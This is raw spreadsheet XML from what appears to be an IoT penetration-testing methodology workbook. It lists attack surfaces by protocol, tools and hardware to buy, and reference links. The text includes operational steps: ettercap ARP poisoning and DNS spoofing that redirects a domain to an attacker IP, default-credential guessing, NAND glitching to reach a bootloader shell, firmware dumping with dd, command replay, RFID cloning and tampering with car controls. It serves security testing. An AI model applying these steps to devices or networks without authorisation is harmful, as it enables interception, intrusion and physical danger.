c. Once the JAR file is generated, use JD-GUI to open the JAR file. You will see the Java files.
2. iOS app:
a. Disassemble app using tools such as Frida, Ida Pro, Ghidra,etc.
b. Analysis and tampering can then be done on the reversed application</t>
  </si>
  <si>
    <t>1. Turn ON device
2. Connect to device using UART, RS232, etc.
3. If an unprotected shell is available, image the device or download all files. Files can be downloaded using netcat (or similar tools) and a PC connected on the same network;
Instead of copying individual files, the firmware may be downloaded to another system or flash drive using the following command (with dd): dd if=/dev/mtdblockX of=/mnt/usbdisk/mtdblockX.bin
4. If the shell is password-protected, try common username/password pairs from a list (e.g. root/root etc.). If no shell is available or the credentials cannot be determined, attempt to interrupt the boot process and enter bootloader shell;
5. If the bootloader shell cannot be entered, try to temporarily disturb the flash interface (e.g. by grounding a data or clock pin) when the bootloader loads the kernel ("NAND Glitch attack") in order to fallback to the bootloader’s shell. Image the device from the bootloader shell (e.g. using nand dump or nand read and md under U-Boot).</t>
  </si>
  <si>
    <t>https://www.cs.bham.ac.uk/~tpc/Papers/CARDIS18.pdf
https://wrongbaud.github.io/router-teardown/
https://2019.hack.lu/archive/2019/snarf-it_pub.pdf</t>
  </si>
  <si>
    <t>1. PuTTY or 
2. screen or 
3. minicom</t>
  </si>
  <si>
    <t>1. grep (grep -rnHi &lt;search_term&gt; /) for passwords, keys, commands, IPs, etc.
2. Analyze the disassembled/decompiled firmware to find any hardcoded passwords, keys (eg. AES), commands, IPs, etc.</t>
  </si>
  <si>
    <t>https://pentestmag.com/ettercap-tutorial-for-windows/
https://www.youtube.com/watch?v=ujFf58Z3qNA
https://packetstormsecurity.com/files/132210/Kankun-Smart-Socket-Mobile-App-Hardcoded-AES-Key.html
https://payatu.com/advisory/hardcoded-aes-256-bit-key-used-in-kankun-smart-socket-and-its-mobile-app</t>
  </si>
  <si>
    <t>https://github.com/secjey/static-firmware-analysis
https://packetstormsecurity.com/files/132210/Kankun-Smart-Socket-Mobile-App-Hardcoded-AES-Key.html
https://payatu.com/advisory/hardcoded-aes-256-bit-key-used-in-kankun-smart-socket-and-its-mobile-app</t>
  </si>
  <si>
    <t>Using methods such as ARP poisoning and DNS spoofing, we may sniff data in the network
1. ARP poisoning
a. ettercap -G
b. Hosts &gt; Scan for hosts
c. Hosts &gt; Hosts List
d. Select first IP as target 1, second IP as target 2
e. MITM &gt; ARP poisoning &gt; Sniff Remote Connections
f. Start &gt; Start sniffing
2. DNS spoofing
a. nano /usr/share/ettercap/etter.dns
b. Forwarding all requests to victim's domain (eg. microsoft.com) to attacker's IP (eg. 107.170.40.56 - linux.org)
microsoft.com A 107.170.40.56
*.microsoft.com A 107.170.40.56
www.microsoft.com PTR 107.170.40.56
c.  ettercap -T -Q -i eth2 -P dns_spoof -M arp // //
Additionally, we may decrypt messages (between devices and server/ gateway) obtained from tools such as Wireshark, ettercap, etc. using passwords/ keys (eg. AES shared key) retrieved from reverse engineering the firmware. Using the decrypted data, we may find commands being used by the device, which may then be encrypted and sent from the laptop using the key found.</t>
  </si>
  <si>
    <t>Wired/ Wireless</t>
  </si>
  <si>
    <t>https://packetstormsecurity.com/files/132210/Kankun-Smart-Socket-Mobile-App-Hardcoded-AES-Key.html
https://payatu.com/advisory/hardcoded-aes-256-bit-key-used-in-kankun-smart-socket-and-its-mobile-app</t>
  </si>
  <si>
    <t>ettercap
Burp Suite
Python
Gatttool
dex2jar
Qark</t>
  </si>
  <si>
    <t>Replay commands from the laptop to the device/ server:
1. Sniff data between device and server/ gateway to obtain commands:
a. If data is encrypted, Decrypt the data using key obtained from firmware, sniffing, etc. if required
b. Find commands being sent from the device/ server/ gateway/ mobile application by executing a command from it (device/ server, etc.) and sniffing the traffic (eg. using Burp or ettercap)
2. Obtain commands from data hardcoded in locations such as device/ gateway OS or mobile application
a. Connect to device/ gateway using UART, SSH, etc. Find hardcoded commands in the OS by manually searching or using tools such as locate, find etc. (or ls -R * | grep -i &lt;search_term, eg. command&gt;. These commands may be stored in some configuration files in the device. Additionally, if documentation is available in the device, these commands may be documented there as well.
b. Decompile the mobile application using tools such as dex2jar (for Android) and find hardcoded commands in the decompiled code. Additionally, static analysis tools such as Qark may be used to find the commands.
c. Use publicly available code of mobile application or device firmware to obtain the commands used by the device/ server/ gateway/ mobile application
Using the commands obtained, we may replay it using tools such as python scripts, Burp Repeater, Bluetooth gatttool, etc.</t>
  </si>
  <si>
    <t>Attack surface</t>
  </si>
  <si>
    <t>Use cases</t>
  </si>
  <si>
    <t>Tools required</t>
  </si>
  <si>
    <t>Protocols</t>
  </si>
  <si>
    <t>a</t>
  </si>
  <si>
    <t>MQTT</t>
  </si>
  <si>
    <t>Read MQTT messages in cleartext by subscribing to the topics
Perform DoS on server
Modify/replay MQTT messages to control IoT device</t>
  </si>
  <si>
    <t>Nil</t>
  </si>
  <si>
    <t>b</t>
  </si>
  <si>
    <t>CoAP</t>
  </si>
  <si>
    <t>Identify the resources available in CoAP server
Sniff data in CoAP requests/responses
Modify/replay command data to CoAP server to control IoT device</t>
  </si>
  <si>
    <t>c</t>
  </si>
  <si>
    <t>CAN Bus</t>
  </si>
  <si>
    <t>Read command codes to control car units
Read hard-coded information in data
Modify/Replay car commands to control car units</t>
  </si>
  <si>
    <t>CANtact</t>
  </si>
  <si>
    <t>Zigbee</t>
  </si>
  <si>
    <t>Sniff Zigbee data over the air
Decrypt data using wireshark
Read hard-coded information in data
Modify/Replay command data to control IoT device</t>
  </si>
  <si>
    <t>1. RZRaven USB Stick
2. AVR Dragon</t>
  </si>
  <si>
    <t>Bluetooth, BLE</t>
  </si>
  <si>
    <t>Enumerate GATT services in Bluetooth device
Sniff Bluetooth traffic between device and mobile phone
Modify/replay command data to control IoT device</t>
  </si>
  <si>
    <t>1. Ubertooth or
2. BLE CSR 4.0 adapter</t>
  </si>
  <si>
    <t>Radio</t>
  </si>
  <si>
    <t>Sniff wireless radio data over the air
Decode data using public/custom protocols being used
Find hardcoded information like passwords
Modify/replay command data by transmitting the specific waveforms</t>
  </si>
  <si>
    <t>1. Packet sniffing and injection: HackRF One
2. Packet sniffing: RTL-SDR</t>
  </si>
  <si>
    <t>d</t>
  </si>
  <si>
    <t>RFID</t>
  </si>
  <si>
    <t>Clone RFID card data
Find pattern in card data used, to create cards with subsequent number</t>
  </si>
  <si>
    <t>1. Proxmark 3 (For almost all cards)
2. Omnikey 5321 Card Reader (iClass)</t>
  </si>
  <si>
    <t>e</t>
  </si>
  <si>
    <t>GSM</t>
  </si>
  <si>
    <t>Sniff GSM data over the air
Find hardcoded information like passwords
Modify/replay command data by transmitting the specific commands</t>
  </si>
  <si>
    <t>1. BladeRF x40
2. Quad-band duck antenna (x2)</t>
  </si>
  <si>
    <t>Reverse engineer firmware from binary to assembly/high-level code</t>
  </si>
  <si>
    <t>1. Radare2 
2. Hopper
3. IDA Pro</t>
  </si>
  <si>
    <t>Hard-coded information</t>
  </si>
  <si>
    <t>Find hardcoded information like passwords, encryption keys, etc. in firmware</t>
  </si>
  <si>
    <t>Firmware modification</t>
  </si>
  <si>
    <t>Modify the firmware and flash it in the IoT device to modify functionality</t>
  </si>
  <si>
    <t>Perform buffer overflow attacks to bypass login, licence key checks, etc.
Run privileged access commands using buffer overflow by changing program flow</t>
  </si>
  <si>
    <t>Keygen attacks</t>
  </si>
  <si>
    <t>Bypass licence key checks by generating custom keys with knowledge from algorithm used in firmware</t>
  </si>
  <si>
    <t>Telnet, SSH</t>
  </si>
  <si>
    <t>Connect to device remotely using telnet/SSH to:
1. Extract/modify firmware
2. Find hardcoded information</t>
  </si>
  <si>
    <t>LAN Cable</t>
  </si>
  <si>
    <t>UART</t>
  </si>
  <si>
    <t>Connect to device locally using exposed UART ports to:
1. Extract/modify firmware
2. Find hardcoded information
3. Open ports/create backdoors to the device</t>
  </si>
  <si>
    <t>UART-USB cable</t>
  </si>
  <si>
    <t>JTAG</t>
  </si>
  <si>
    <t>Connect to the device locally using exposed JTAG ports to:
1. Debug device while in operation by analyzing and modifying registers
2. Extract/Modify firmware
3. Find hardcoded information</t>
  </si>
  <si>
    <t>1. JTAGulator or
2. Arduino</t>
  </si>
  <si>
    <t>Flash Memory extraction</t>
  </si>
  <si>
    <t>Extract and modify firmware from flash memory locally (either on-board or by removing flash memory from board)</t>
  </si>
  <si>
    <t>Sniffing data flow</t>
  </si>
  <si>
    <t>Sniff data flow between components in IoT device</t>
  </si>
  <si>
    <t>Salae Logic Analyzer</t>
  </si>
  <si>
    <t>f</t>
  </si>
  <si>
    <t>USB</t>
  </si>
  <si>
    <t>Extract and modify firmware by mounting USB pendrive</t>
  </si>
  <si>
    <t>Pendrive</t>
  </si>
  <si>
    <t>Web app, mobile app</t>
  </si>
  <si>
    <t>Escalate privileges from normal user to admin user by exploiting vulnerabilities like IDOR to issue Over-The-Air (OTA) update of modified firmware to all devices</t>
  </si>
  <si>
    <t>Hardcoded information</t>
  </si>
  <si>
    <t>Find hardcoded information like passwords, encryption keys, etc. to control the device using credentials obtained</t>
  </si>
  <si>
    <t>Parameter tampering</t>
  </si>
  <si>
    <t>Tampering parameters like Vehicle Identification Number (VIN) of car to obtain information like vehicle conditions
Modify parameters to control device like braking/accelerating in a car</t>
  </si>
  <si>
    <t>Protocol</t>
  </si>
  <si>
    <t>Price</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>URL</t>
  </si>
  <si>
    <t>CAN</t>
  </si>
  <si>
    <t>Not bought</t>
  </si>
  <si>
    <t>https://www.amazon.com/CANtact-Source-Controller-Network-Converter/dp/B00XLX05V2</t>
  </si>
  <si>
    <t>RZRaven USB Stick</t>
  </si>
  <si>
    <t>https://in.element14.com/microchip/atavrrzusbstick/at86rf230-usb-stick-starter-kit/dp/1562234?krypto=LQY9CiJ6bg4psmx52Fcl0K%2Bz2IqJH%2FEli%2BNi3U6deWe22AFUZDKWYFZ1hSNa1Fvbt674VQM7CMAcIjSjZHKb6itPdGmI3ZaIJR8sACKPd4eFF0I9wZStvEdgX7ZFBklJSVmQjAOJFbsm7m0uOvJlagtKxlJf9v6b1H17RHEHbHw1OcOMGO9A8LHBSXg5xpNenaUFUw7m%2FD%2BnLfLoyaHUeALbieN%2B52rbgWKkuEZdVvPFRGD4l8cIM8WGwvx57jXkkJuWZ3RW6bnZW1E2sBmzGpXXkUGEq8fmGgZb%2BmVd3rGuMg7KaGIi8%2Fez%2BFXBgUXk4ptL3e5CMOnf5j9P%2BKK7kGhrhm%2FIw57BYJnFH4elquRzTN%2BT5JJARq77DvrbDdBf8yXqPiqAyWD9Rt3mr4ZLEnLouJlLlimXJMRv%2BVMIToAk2qLLtmR5E3%2BBglB8dyC9O3hV8JzI76bPOq3kQS12JhmmW%2FompsPBR8e3wQk3V5vfEKWsvma0CktMg5AkVFGi1Ksv8U7zr07EYLgcZJSZlvcINBYpZNeLLOwP82XLliY%3D</t>
  </si>
  <si>
    <t>AVR Dragon</t>
  </si>
  <si>
    <t>https://in.element14.com/microchip/atavrdragon/in-system-debugger-programmer/dp/1455088?krypto=rRd0tnLxzCl5nzOIjUldY6m5LoomPS2dwTGyWbFk1CS7oBWrv%2BqDBCuLt1RIDCaMHQQ1Ka1oPxQJDdDgzRaSkCnVBOmNX%2FILtq3IE9yESrqClYqfQ5B8MnVDyvnaNr67BnpEKulckKwY8N09j6vw9y7N4itL0d5NXEBMNOPfSRLD0Upo0SGY1HkphNAsienZdvasLymmjBjGCTzZmwHDQa9Ky5sLwAh1s8sj4OAmZfJB%2BNAZgZMQYgc5KO0Hbru%2Bg%2BR6I0qrvRbM2nFkhwFBex674GqRh3dJuwKl11GogIutdCAIBJKxJK7bonuxA7svHSI%2F0zCsywP1qAiIZ1zJmzEVdEF5jFQZUwGfkbgnyxlcs13614gL29m8b%2BW7v8s6lgkVj3jcSbC6FtYV6uUCdIfChUK7V7XHeXg4obzyJOmyyJ8pxqpEcGgv%2FeM4xUraiGWlV9%2F9u2MlJ0nhFMS1%2FEPji8yOa3%2BQg1gnIA4XEG2rRMV12mmrrfrFzmHP3lnQICU%2BrRvNM%2B%2FFaPNR6szdWg%3D%3D</t>
  </si>
  <si>
    <t>https://www.mouser.in/ProductDetail/SparkFun/WRL-10573?qs=%2fha2pyFadugEnPgPDNXfKVVN4GcC%2f5f4PWkM0uUshLu9D%252bQ9EWv3Ig%3d%3d</t>
  </si>
  <si>
    <t>BLE CSR 4.0 adapter</t>
  </si>
  <si>
    <t>https://www.amazon.in/GENERIC-Ultra-Mini-Bluetooth-Dongle-Adapter/dp/B0117H7GZ6</t>
  </si>
  <si>
    <t>HackRF One</t>
  </si>
  <si>
    <t>https://www.mouser.in/ProductDetail/SparkFun/WRL-13001?qs=sGAEpiMZZMuC4zZxLL0ZTS7YmDoMVLyc7ek0OgISSkh%2fJFA2s4ylYw%3d%3d</t>
  </si>
  <si>
    <t>RTL-SDR (High Quality)</t>
  </si>
  <si>
    <t>https://www.amazon.in/NooElec-NESDR-Mini-RTL-SDR-Receiver/dp/B00VZ1AWQA/ref=sr_1_3?ie=UTF8&amp;qid=1540310285&amp;sr=8-3&amp;keywords=rtl+sdr</t>
  </si>
  <si>
    <t>RTL-SDR (Normal Quality)</t>
  </si>
  <si>
    <t>https://www.amazon.in/Leoie-RTL2832U-RTL-SDR-Infrared-Receiver/dp/B07F6ZQZ58/ref=sr_1_6?ie=UTF8&amp;qid=1540310285&amp;sr=8-6&amp;keywords=rtl+sdr</t>
  </si>
  <si>
    <t>Proxmark 3</t>
  </si>
  <si>
    <t>Bought</t>
  </si>
  <si>
    <t>https://www.amazon.com/Proxmark3-ProxmarkIII-Kits-RFID-Clone/dp/B075874TMN/ref=sr_1_3?ie=UTF8&amp;qid=1540311248&amp;sr=8-3&amp;keywords=proxmark+3</t>
  </si>
  <si>
    <t>Omnikey 5321 reader</t>
  </si>
  <si>
    <t>http://www.secutronsystems.com/access-control.html</t>
  </si>
  <si>
    <t>BladeRF x40</t>
  </si>
  <si>
    <t>https://www.mouser.in/ProductDetail/SparkFun/WRL-14041?qs=sGAEpiMZZMuC4zZxLL0ZTWKSx9rlNgcTYF%2fL2%2fNpS6eoq8LpWf%2fNgA%3d%3d</t>
  </si>
  <si>
    <t>Quad-band duck antenna (x2)</t>
  </si>
  <si>
    <t>https://www.mouser.in/ProductDetail/SparkFun/CEL-00675?qs=%2fha2pyFaduhQ5oYzqidkU0FJQOGQ2JYIHsjxYMXnmTCbR2%2f6aFaXs6yIgYoZJ6PmO4vfQRldNNQ%3d</t>
  </si>
  <si>
    <t>https://www.amazon.in/Module-Serial-Converter-Replace-Robotbanao-com/dp/B07F13YBKL/ref=sr_1_2_sspa?ie=UTF8&amp;qid=1540311012&amp;sr=8-2-spons&amp;keywords=uart+usb+converter&amp;psc=1</t>
  </si>
  <si>
    <t>JTAGulator</t>
  </si>
  <si>
    <t>https://www.mouser.in/ProductDetail/Parallax/32115?qs=sGAEpiMZZMvfqjtR74pUynKW0gw3MN49adKxkQLlZ0Q%3d</t>
  </si>
  <si>
    <t>Arduino</t>
  </si>
  <si>
    <t>https://www.amazon.in/s/ref=nb_sb_noss?url=search-alias%3Daps&amp;field-keywords=arduino</t>
  </si>
  <si>
    <t>https://www.amazon.com/SparkFun-PID-12942-Bus-Pirate/dp/B01KKYN9LW</t>
  </si>
  <si>
    <t>Logic analyzer</t>
  </si>
  <si>
    <t>https://www.amazon.in/REES52-Logic-Analyzer-Device-Channel/dp/B07977SBKF/ref=pd_sbs_23_2?_encoding=UTF8&amp;pd_rd_i=B07977SBKF&amp;pd_rd_r=a8174a58-ebb0-11e8-9060-4b622bef9fcb&amp;pd_rd_w=w69rd&amp;pd_rd_wg=3OfyX&amp;pf_rd_i=desktop-dp-sims&amp;pf_rd_m=A1VBAL9TL5WCBF&amp;pf_rd_p=9fc668a0-2aac-4fb6-970f-606919bc0185&amp;pf_rd_r=7JBD88DR0T4Q0CW9T43S&amp;pf_rd_s=desktop-dp-sims&amp;pf_rd_t=40701&amp;psc=1&amp;refRID=7JBD88DR0T4Q0CW9T43S</t>
  </si>
  <si>
    <t>De-soldering</t>
  </si>
  <si>
    <t>Hot air gun</t>
  </si>
  <si>
    <t>https://www.amazon.in/BLACK-DECKER-KX1800-1800-Watt-Temperature/dp/B00ICIIXRE/ref=sr_1_1?s=home-improvement&amp;ie=UTF8&amp;qid=1540311703&amp;sr=1-1&amp;keywords=hot+air+gun</t>
  </si>
  <si>
    <t>Flash memory connector</t>
  </si>
  <si>
    <t>SOIC8 SOP8 Clip</t>
  </si>
  <si>
    <t>https://www.amazon.in/KitsGuru-Test-Clips-Socket-Adpter/dp/B075TB1X53/ref=sr_1_1?ie=UTF8&amp;qid=1507480696&amp;sr=8-1&amp;keywords=soic8+sop8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</si>
</sst>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rgb="FFFF0000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>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40">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>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 fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="1"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top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment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0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="1" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="1" xfId="2" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="4" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="6" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="6" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1"/>
    <xf numFmtId="4" fontId="0" fillId="0" borderId="7" xfId="0" applyNumberFormat="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="4" xfId="0" applyFill="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3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="2" xfId="2" applyFont="1" applyBorder="1"/>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="4" xfId="2" applyFont="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7"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top"/>
    </xf>
  </cellXfs>
  <cellStyles count="3">
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Percent" xfId="2" builtinId="5"/>
  </cellStyles>
  <dxfs count="21">
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC00000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC00000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC00000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC00000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC00000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFC00000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>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wasp.org/index.php/OWASP_API_Security_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ferrancasanovas.wordpress.com/cracking-and-sniffing-gsm-with-rtl-sdr-concept/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.troyhunt.com/controlling-vehicle-features-of-nissan/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cs.bham.ac.uk/~tpc/Papers/CARDIS18.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.devttys0.com/2014/02/reversing-the-wrt120n-firmware-obfuscation/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/studio/command-line/logcat" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whitelist1.com/2017/05/10-buffer-overflow-exploitation-on-mips.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=uIVBVd6yi_A" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/exploit-shellshock-web-server-using-metasploit-0186084/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whitelist1.com/2017/05/10-buffer-overflow-exploitation-on-mips.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/documentation/desktop/tools/repeater/using" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.portswigger.net/customer/en/portal/articles/2590642-using-burp-to-test-for-code-injection-vulnerabilities" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmag.com/ettercap-tutorial-for-windows/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.devttys0.com/2014/02/cracking-linksys-crypto/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmag.com/ettercap-tutorial-for-windows/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@shreyasubale/reverse-engineering-a-wireless-doorbell-and-performing-a-replay-attack-part1-23d59d57ce82" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qasymphony.com/blog/automated-api-testing-tutorial/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/greatscottgadgets/ubertooth/issues/180" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/12732882/reverse-engineering-from-an-apk-file-to-a-project" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.testbytes.net/blog/api-security-testing-rules-and-checklist/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.atlasrfidstore.com/rfid-vs-nfc" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.exploitee.rs/viewtopic.php?t=1642" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/4/42/OWASP_Web_Application_Security_Quick_Reference_Guide_0.2.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.security-sleuth.com/sleuth-blog/2015/9/6/now-i-wanna-sniff-some-bluetooth-sniffing-and-cracking-bluetooth-with-the-ubertoothone" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tunnelsup.com/getting-started-cracking-password-hashes/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.portswigger.net/customer/portal/articles/1964020-using-burp-to-brute-force-a-login-page" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/how-i-bypassed-the-otp-verification-process-part-2-c69f067216d" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cs.bham.ac.uk/~tpc/Papers/CARDIS18.pdf"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5FE10-AAED-44E2-90B1-D9710950155F}">
  <dimension ref="A1:M102"/>
  <sheetViews>
    <sheetView showGridLines="0" tabSelected="1" zoomScale="64" zoomScaleNormal="64" workbookViewId="0">
      <pane xSplit="6" ySplit="1" topLeftCell="G2" activePane="bottomRight" state="frozen"/>
      <selection pane="topRight" activeCell="G1" sqref="G1"/>
      <selection pane="bottomLeft" activeCell="A2" sqref="A2"/>
      <selection pane="bottomRight"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.77734375" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
